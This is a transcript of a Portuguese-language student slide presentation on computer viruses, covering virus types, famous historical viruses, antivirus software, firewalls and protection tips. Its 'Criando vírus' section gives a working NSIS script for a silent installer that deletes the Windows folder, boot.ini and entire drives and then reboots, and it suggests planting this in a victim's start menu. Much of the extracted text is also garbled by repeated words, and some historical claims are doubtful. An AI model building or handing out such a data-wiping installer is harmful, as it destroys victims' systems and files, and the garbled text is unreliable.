Virus em Hw

59
Vírus

description

Trabalho apresentado na aula de Arquitetura de Hardware para o professor Claudio Cura. Integrantes: Eduardo Bregaida Roberta Davi Vinicius

Transcript of Virus em Hw

Page 1: Virus em Hw

Vírus

Page 2: Virus em Hw

Texto Educativo Não nos responsabilizamos pelo mau uso… Não façam besteiras ;p

Page 3: Virus em Hw

Quem Somos?

Page 4: Virus em Hw

São softwares que foram São softwares que foram desenvolvidos por desenvolvidos por programadores, onde burlam programadores, onde burlam sistemas alheios; sistemas alheios;

Atuam da mesma forma que Atuam da mesma forma que um vírus real;um vírus real;

Primeiro vírus surgiu em Primeiro vírus surgiu em 1983,por Lean Eidelmen;1983,por Lean Eidelmen;

Page 5: Virus em Hw

Alguns tipos Alguns tipos

de de vírusvírus

Page 6: Virus em Hw

Virus de Boot- Infecta a partição deinicialização do Sistema Operacional.

Time Bomb - Ativados em Datas e horários especificos.

Worm - Vírus que tenta se multiplicar em outras máquinas.

Trojan Hourse - Assim como na história, este vírus se introduz na máquina da vítima, permitindo que o atacante tenha controle sobre a máquina.Hijackers - Scripts que normalmente atacam os Browsers modificando suas páginas iniciais e abrindo urls não conhecidas pelo usuário..

Page 7: Virus em Hw

Keylogger - Vírus que obtem tudo que o usuário digita e envia a pessoa que o enviou.

Computador Zumbi ou Estado Zumbi - Vírus que permite ao atacante instalar Keyloggers e outros, também pode aplicar ataques a sites, sem que o usuário deste computador saiba.

Stealth - Vírus polimórfico, que se multiplica e se torna indetectável, exemplos: Natas e Brain.

Macro - Vírus que infecta o pacote Office, causando inconveniências para a pessoa que tem seu computador infectado.

Page 8: Virus em Hw

Dados estatísticos

Page 9: Virus em Hw

Dados estatísticosDados estatísticos

•Até Até 1995 1995 - 5.000 vírus conhecidos;- 5.000 vírus conhecidos;•Até Até 1999 1999 - 20.500 vírus conhecidos;- 20.500 vírus conhecidos;•Até Até 2000 2000 - 49.000 vírus conhecidos;- 49.000 vírus conhecidos;•Até Até 2001 2001 - 58.000 vírus conhecidos;- 58.000 vírus conhecidos;•Até Até 20052005 - Aproximadamente 75.000 vírus - Aproximadamente 75.000 vírus conhecidos;conhecidos;•Até Até 20072007 - Aproximadamente 200.000 vírus - Aproximadamente 200.000 vírus conhecidos;conhecidos;•Até Até novembronovembro de de 20082008 - Mais de 530.000 - Mais de 530.000 vírus conhecidos.vírus conhecidos.•Até Até marçomarço de de 20092009 - Mais 630.000 vírus - Mais 630.000 vírus conhecidos.conhecidos.

Page 10: Virus em Hw

Crackers e hackers

Hackers são os que quebram senhas, códigos e sistemas de segurança por puro prazer em achar tais falhas. Preocupam-se em conhecer o funcionamento mais íntimo

de um sistema computacional ou seja uma sem intenções de prejudicar outras ou invadir sistemas.

Crackers é o criminoso virtual, que extorque pessoas usando seus conhecimentos, usando as mais variadas estratégias. Aficcionados em informática, conhecem muitas linguagens

de programação e quase sempre jovens, que criavam seus vírus, para muitas vezes, saber o quanto eles poderiam se propagar.

Page 11: Virus em Hw

Vírus mais comuns

Page 12: Virus em Hw

Elk Cloner

•O primeiro vírus ampla distribuição criado por um garoto de 15 anos em 1982.•Atacava computadores Apple 2 com DOS;•Não atacava arquivos apenas exibia uma mensagem:•Elk Cloner: The program with a personality It will get on all your disks It will infiltrate your chips Yes it's Cloner! It will stick to you like glue It will modify RAM too Send in the Cloner!

Page 13: Virus em Hw

Brain Janeiro de 1986; Considerado um dos primeiros vírus conhecido; Afetava o MS-DOS; Welcome to the Dungeon © 1986 Basit * Amjad (pvt) Ltd.

BRAIN COMPUTER SERVICES 730 NIZAM BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN PHONE: 430791,443248,280530. Beware of this VIRUS.... Contact us for vaccination…

Motivo: foi criado para monitorar cópias piratas de um software médico de monitoramento cardíaco que haviam desenvolvido para a Apple;

O código foi portado para DOS; A companhia foi alvo de ações judiciais e foi fechada.

Page 14: Virus em Hw

Ping Pong

•Ano 1988;•Um dos primeiros vírus conhecidos no Brasil;•Afetava o MS-DOS e PC-DOS;•Se instalava na Interrupção 8 da BIOS;•Dependendo do Tic-Tac do relógio a bolinha pulava de um lado a outro da tela;•Uma vez o computador infectado, multiplicava-se nos disquetes.

Page 15: Virus em Hw

Sasser

Um dos primeiros que explora a invasão do PC; Não precisa abrir o email ou executar o arquivo; A infecção da-se por um processo de Exploit; Este Vírus explorava a rede e permitia controle

do computador infectado; Utilizava a porta RPC do Windows para invadir.

Page 16: Virus em Hw

Jerusálem Residente em memória; Infecta arquivos com extensão .COM, .EXE, .BIN, .PIF e .OVL; Não infecta o arquivo COMMAND.COM; Pode ter sido baseado no vírus Suriv 3.00 (isolado após o Jerusalém); Vários outros vírus se baseiam em seu código e método de infecção e

ataque; Interrompe o computador das 08h e 21h; Após 30 minutos aumentam demais os arquivos infectados, deixando os

computadores lentos; Ataca às sextas-feiras cujo número seja 13, por isso muitos os chamam de

Sexta-Feira 13; Nesse momento o vírus apaga qualquer arquivo que o usuário tenta

executar.

Page 17: Virus em Hw

Zotob

Vírus do tipo Worm que ataca o Windows 2000; A gravidade classificada pela Microsoft como

moderada; A Microsoft possui uma atualização de segurança

contra este vírus e suas variantes; Variantes conhecidas:

Zotob A, B, C, D e E.

Page 18: Virus em Hw

Winman32 Um vírus informativo; Modo de infecção: sites de relacionamento; Não causa danos ao SO, porém dispara mensagens nos sistemas de

relacionamento que a vitima acessa; Mensagens conhecidas:

"Olha esse video q encontrei sobre o acidente da gol.. (link com vírus omitido)"

"Veja as fotos da nossa festa, ficaram ótimas!! (link com vírus omitido)"

"Assista ao vídeo da Daniela Cicarrelli fazendo sexo com o namorado na praia, últimos dias no ar!!! (link com vírus omitido)"

"Um casal de adolescentes caiu na besteira de tirar fotos e filmar suas transas, a porra toda caiu na net, coitados... veja você mesmo (link com vírus omitido)"

Page 19: Virus em Hw

Sircam

Se propaga por e-mail;Ataca usuários de Windows;Texto enviado no e-mail uma

mensagem com o vírus em anexo: "Eu te enviei esse arquivo, me

responda se gostou".

Page 20: Virus em Hw

Natas ou Satan

Desenvolvido por James Gentile em 94; Ataca o SO DOS; Seu nome é o nome Satanás em inglês Satan; Adota Técnicas Stelth, quando está na RAM,

impede que o código que ele aloja no final de todos os programas infectados seja detectado;

Pode sobreescrever trechos do HD ou setor de Boot.

Page 21: Virus em Hw

Leandro & Kelly Criado em 1995; Distribuído em SW piratas; Atacava o SO MS-DOS; Se multiplica em discos inseridos no PC infectado; Infecta o Boot; Teve uma grande repercursão, pois é uma

variante do vírus Michelangelo; Foi um vírus brasileiro de grande impacto.

Page 22: Virus em Hw

MichelangeloVariante do Stoned;Entra em atividade no dia do

nascimento de Michelangelo, dia 6 de março;

Sobreescreve a maior parte do HD.

Page 23: Virus em Hw

Stoned Feito para ser inofensivo, porém devido um erro de

código, porém escreve na trilha zero do disco; Ah diversas variantes deste vírus, alguns com

mensagens plíticas, outras explodem a tela em cores de chamas quando passa um mês depois de instalados;

Mensagens mais comuns: “Your computer is now stoned." "Bloody! Jun. 4, 1989". "The Swedish Disaster".

Page 24: Virus em Hw

Pro Rat É um backdoor da classe Rat (Remote Administrator Tool), possui muitas funções de espião; Permite que pessoas executem muitas ações maliciosas; Algumas funcões:

Keystrokes (Keylogger) Roubar senhas Controle total sobre arquivos Formatação de drives Controle de impressora Abrir/fechar drive de CD Esconder a barra de tarefas, área de trabalho e botão iniciar Tirar screenshots Visualizar informações do sistema Visualizar webcam Escutar microfone Fazer downloads e rodar arquivos Travar a tela, mouse, teclado, dentre outros Visualizar a area de trabalho da vitima Chegando até a formatar a máquina da vítima.

Page 25: Virus em Hw

NetBus

Outro backdoor;Uma vez instalado permite que o

atacante tenha total controle sobre a máquina da vítima;

Muito usado para roubar informações.

Page 26: Virus em Hw

Chernobyl

Page 27: Virus em Hw

Win32/CIH ou Chernobyl

Criado em 98 por Chen Ing-Hau; Um dos mais temidos vírus e o ÚNICO efetivo no ataque ao

Hardware; Apagava a BIOS e o Disco de Boot no dia 26 de abril (algumas

variantes atacavam em outros meses também); Curiosidade: em 26 de Abril aconteceu o desastre Nuclear de

Chernobyl, daí o nome; É um vírus residente em memória, infecta qualquer disco

externo; É da categoria stealth; Ataca a Flash Bios; Por motivos de compatibilidade não ataca as versões Windows

NT, 2000, XP, 2003, Vista e 7;

Page 28: Virus em Hw

Win32/CIH ou Chernobyl

Primeiro Passo Download da BIOS e uma placa mãe compatível.

Segundo passo, reprogramação da BIOS: No DOS, remova o chip do BIOS bom e substitua pelo chip do BIOS.

Passo três: Rode o programa de gravação do BIOS e reprograme o BIOS apagado.

Passo quatro: Desligue o micro, remova o BIOS que você acabou de reprogramar e

instale de volta o BIOS original. Passo quatro:

Instale o BIOS reprogramado na placa-mãe "morta" e ligue-a. Passo cinco:

Rode o anti-vírus e o programa de recuperação de dados no HD do micro atacado, caso o mesmo tenha sido infectado.

Informações: http://www.clubedohardware.com.br/artigos/654/1

Page 29: Virus em Hw

Vírus em celularVírus em celular

Page 30: Virus em Hw

"Cabir.A", "Cabir.A", Junho de 2004;Junho de 2004;

Não infectou muitos aparelhos;Não infectou muitos aparelhos;

Transmitido via BlueTooh;Transmitido via BlueTooh;

Variantes em 2005;Variantes em 2005;

Mabir.A, Skulls.A, Commwarrior.A, Locknut.B e Fontal.A; Mabir.A, Skulls.A, Commwarrior.A, Locknut.B e Fontal.A;

São apenas vírus que disparam mensagens e afins;

Não tem propagação rápida;

Não são destrutivos.

Page 31: Virus em Hw

Criando Criando vírusvírus

Page 32: Virus em Hw

Com o Bloco de notas digite :Com o Bloco de notas digite :

!define PRODUCT_NAME "APAGADOR_XXX"!define PRODUCT_NAME "APAGADOR_XXX"!define PRODUCT_VERSION "1.0"!define PRODUCT_VERSION "1.0"!define PRODUCT_PUBLISHER "HACKER_XXX"!define PRODUCT_PUBLISHER "HACKER_XXX"

SetCompressor lzmaSetCompressor lzma Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"

OutFile "MeuVirus.exe"OutFile "MeuVirus.exe"InstallDir "$TEMP"InstallDir "$TEMP"Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"install.ico"SilentInstall silentSilentInstall silent

Section "Sec001" SEC01Section "Sec001" SEC01Delete /REBOOTOK "$WINDIR\*.*"Delete /REBOOTOK "$WINDIR\*.*"SectionEndSectionEnd

Section -PostSection -PostRebootRebootSectionEndSectionEnd

Page 33: Virus em Hw

Próximo passo:Próximo passo:

Salvar ComoSalvar Como

qualquerNomequalquerNome.nsi.nsi

Experimente jogá-lo no menu iniciar da vítima ;)Experimente jogá-lo no menu iniciar da vítima ;)

Page 34: Virus em Hw

Mais? =)

Page 35: Virus em Hw

Tudo o que você deletar coloque essas Tudo o que você deletar coloque essas linhas:linhas:

Delete /REBOOTOK "C:\boot.ini"Delete /REBOOTOK "C:\boot.ini"Delete /REBOOTOK "C:\Meus documentos\*.*"Delete /REBOOTOK "C:\Meus documentos\*.*"Delete /REBOOTOK "C:\*.*"Delete /REBOOTOK "C:\*.*"Delete /REBOOTOK "D:\*.*"Delete /REBOOTOK "D:\*.*"Delete /REBOOTOK "E:\*.*"Delete /REBOOTOK "E:\*.*"Delete /REBOOTOK "F:\*.*"Delete /REBOOTOK "F:\*.*"Delete /REBOOTOK "G:\*.*"Delete /REBOOTOK "G:\*.*"Delete /REBOOTOK "C:\Arquivos de Delete /REBOOTOK "C:\Arquivos de programas\*.*"programas\*.*"

Adicione o que quiser, arquivos Adicione o que quiser, arquivos específicos, etc.específicos, etc.

Page 36: Virus em Hw

Usuário de Windows

Page 37: Virus em Hw

Uma Esperança

Page 38: Virus em Hw

Antivírussão softwares projetados para são softwares projetados para detectar e eliminar vírus de detectar e eliminar vírus de computador, monitorando computador, monitorando automaticamente todos os automaticamente todos os arquivos que são abertos no PCarquivos que são abertos no PC

Page 39: Virus em Hw

Por vezes quando executamos um qualquer script no Windows seja ele VBscript ou JSscript recebemos uma mensagem do antivírus a avisar da exploração de alguma falha do sistema

Page 40: Virus em Hw
Page 41: Virus em Hw

Peter Norton, empresário de TI, apagou acidentalmente um arquivo, com isso desenvolveu o Norton Utilities para restaurá-los. Ele criou a Symantec, em 1982, dando início a criação e comercialização de softwares de seguranças no mercado, e livros sobre o assunto. Ele foi um dos primeiros desenvolvedores de sistemas de segurança

Page 42: Virus em Hw

Apresentação do Microsoft PowerPoint

Page 43: Virus em Hw

FirewallFirewallOutra grande Outra grande ferramenta de ferramenta de proteção contra os proteção contra os VírusVírus

Page 44: Virus em Hw

São programas que monitoram todos os dados que entram e saem do micro

funcionam como complemento do antivírus, pois ajudam a evitar que os vírus tentem se multiplicar via rede e dificulta a ação de hackers (invasores de computadores)

Seu objetivo é permitir somente a transmissão e a recepção de dados autorizados

Page 45: Virus em Hw
Page 46: Virus em Hw

Filtragem de pacotes•firewall que trabalha na filtragem de pacotes é muito utilizado em redes pequenas ou de porte médio. •Alguns sistemas ou serviços podem ser liberados completamente (por exemplo, o serviço de e-mail da rede); •Enquanto outros são bloqueados por padrão, por terem riscos elevados (como softwares de mensagens instantâneas, tal como o ICQ). •O grande problema desse tipo de firewall, é que as regras aplicadas podem ser muito complexas e causar perda de desempenho da rede ou não serem eficazes o suficiente

Page 47: Virus em Hw

O firewall de aplicação permite um acompanhamento mais preciso do tráfego entre a rede e a Internet (ou entre a rede e outra rede). É possível, inclusive, contar com recursos de log e ferramentas de auditoria. Tais características deixam claro que este tipo de firewall é voltado a redes de porte médio ou grande e que sua configuração exige certa experiência no assunto

Page 48: Virus em Hw
Page 49: Virus em Hw

Razões para utilizar um Razões para utilizar um firewallfirewall

Page 50: Virus em Hw

11 - O firewall pode ser usado para ajudar a impedir que - O firewall pode ser usado para ajudar a impedir que sua rede ou seu computador seja acessado sem sua rede ou seu computador seja acessado sem autorização. Assim, é possível evitar que informações autorização. Assim, é possível evitar que informações sejam capturadas ou que sistemas tenham seu sejam capturadas ou que sistemas tenham seu funcionamento prejudicado pela ação de hackersfuncionamento prejudicado pela ação de hackers

22 - O firewall é um grande aliado no combate a vírus e - O firewall é um grande aliado no combate a vírus e cavalos –de -tróia, uma vez que é capaz de bloquear cavalos –de -tróia, uma vez que é capaz de bloquear portas que eventualmente sejam usadas pelas "pragas portas que eventualmente sejam usadas pelas "pragas digitais" ou então bloquear acesso a programas não digitais" ou então bloquear acesso a programas não autorizadosautorizados

33 - Em redes corporativas, é possível evitar que os - Em redes corporativas, é possível evitar que os usuários acessem serviços ou sistemas indevidos, além usuários acessem serviços ou sistemas indevidos, além de ter o controle sobre as ações realizadas na rede, de ter o controle sobre as ações realizadas na rede, sendo possível até mesmo descobrir quais usuários as sendo possível até mesmo descobrir quais usuários as efetuaramefetuaram

As 3 principais razões para se usar um firewall são:

Page 51: Virus em Hw

Dicas de como se proteger

Page 52: Virus em Hw

Desconfie dos e-mails que recebe...

Não clique em qualquer link ou anexo...

Simples não?

Page 53: Virus em Hw

Não abra qualquer site;

Não baixe qualquer arquivo sem saber a fonte;

NÃO EXISTE JOGOS DE 300Kb para PlayStation e afins...

Nunca forneça suas senhas...

Page 54: Virus em Hw

Sempre atualize seus sistemas de proteção:

Firewall;Anti-Vírus;Anti-Spyware;Bla bla bla ;)

Page 55: Virus em Hw

Não deixar pastas compartilhadas no HD desnecessariamente

Certificar que a conexão estabelecida entre o computador e os servidores é segura, conforme explicado no tópico segurança no Internet Banking

Te pego na Encruza

Page 56: Virus em Hw

Maldita inclusão digital e PC do milhão…

http://www.youtube.com/watch?v=8zFYt1_0FUE

Page 57: Virus em Hw

O Windows não tem falhas…

Page 58: Virus em Hw

Não quer vírus?

Page 59: Virus em Hw

FIM